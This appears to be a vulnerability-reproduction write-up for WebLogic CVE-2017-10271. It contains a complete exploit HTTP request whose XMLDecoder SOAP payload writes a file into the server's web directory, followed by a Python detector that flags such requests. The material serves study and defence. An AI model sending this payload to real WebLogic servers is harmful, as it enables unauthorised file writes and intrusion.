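WebLogic (CVE-2017-10271) Vulnerability Reproduction, with EXP

Vulnerability advisory: http://www.hackxc.cc/?post=235


Vulnerability reproduction:

Test environment: Windows 2003, WebLogic version 10.3.6.0, JDK 6.0


First, WebLogic has to be deployed. I won't demonstrate that here; since some readers may not know how, a deployment tutorial is linked below.

WebLogic installation and configuration: http://www.360doc.com/content/15/0918/15/21514996_499925417.shtml


After starting the service, visit the page: http://<domain>:<default WebLogic port>/wls-wsat/CoordinatorPortType

If the page shows the following content, the vulnerability may be present.

Start Burp, capture the request made when visiting this page, and send it to the Repeater module.

The EXP is as follows: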

POST //wls-wsat/CoordinatorPortType HTTP/1.0
Host: http://192.168.174.130:7001/
Accept: */*
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Accept-Language: zh-cn
UA-CPU: x86
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Pragma: no-cache
Content-Length: 553

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/2.txt</string><void method="println">
<string>Weblogic

By:www.hackxc.cc</string></void><void method="close"/>
</object>
</java>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

Click Go. After a successful upload, the file is available at: http://192.168.174.130:7001/wls-wsat/2.txt



Follow-up notes:

WebLogic default port: 7001

Default path: servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/2.txt
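
For detection, the request above has a recognisable shape: a POST under /wls-wsat/ whose SOAP WorkContext header carries an XMLDecoder document. The Python check below is an added example, not part of the original post; the function name inspect_request and the sample request are constructed for illustration.

```python
import posixpath
import xml.etree.ElementTree as ET
from urllib.parse import unquote

WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"
# XMLDecoder element names that create objects, call methods or access fields.
ACTIVE_TAGS = {"object", "void", "new", "array", "method", "field"}

def inspect_request(raw):
    """Return findings for one raw HTTP request; an empty list means not flagged."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2 or parts[0].upper() != "POST":
        return []
    # Decode and normalise the path; the page's request uses a doubled leading
    # slash, which posixpath.normpath() preserves, so collapse it explicitly.
    path = "/" + posixpath.normpath(unquote(parts[1].split("?", 1)[0])).lstrip("/")
    if not (path.lower() + "/").startswith("/wls-wsat/"):
        return []
    try:
        root = ET.fromstring(body.strip())
    except ET.ParseError:
        return ["wls-wsat POST whose body is not well-formed XML"]
    findings = []
    for ctx in root.iter("{%s}WorkContext" % WORKAREA_NS):
        for el in ctx.iter():
            name = el.tag.rsplit("}", 1)[-1].lower()
            if name == "java" and el.get("class"):
                findings.append("java class=" + el.get("class"))
            elif name in ACTIVE_TAGS:
                findings.append((name + " " + (el.get("class") or el.get("method") or "")).strip())
    return findings

# Constructed sample, abbreviated from the request shown on this page.
SAMPLE = """POST //wls-wsat/CoordinatorPortType HTTP/1.0
Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter"><string>2.txt</string>
<void method="println"><string>test</string></void><void method="close"/>
</object></java></java></work:WorkContext>
</soapenv:Header><soapenv:Body/></soapenv:Envelope>"""

if __name__ == "__main__":
    for finding in inspect_request(SAMPLE):
        print(finding)
```

The same element check can be run over request bodies logged by a reverse proxy or WAF in front of port 7001.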
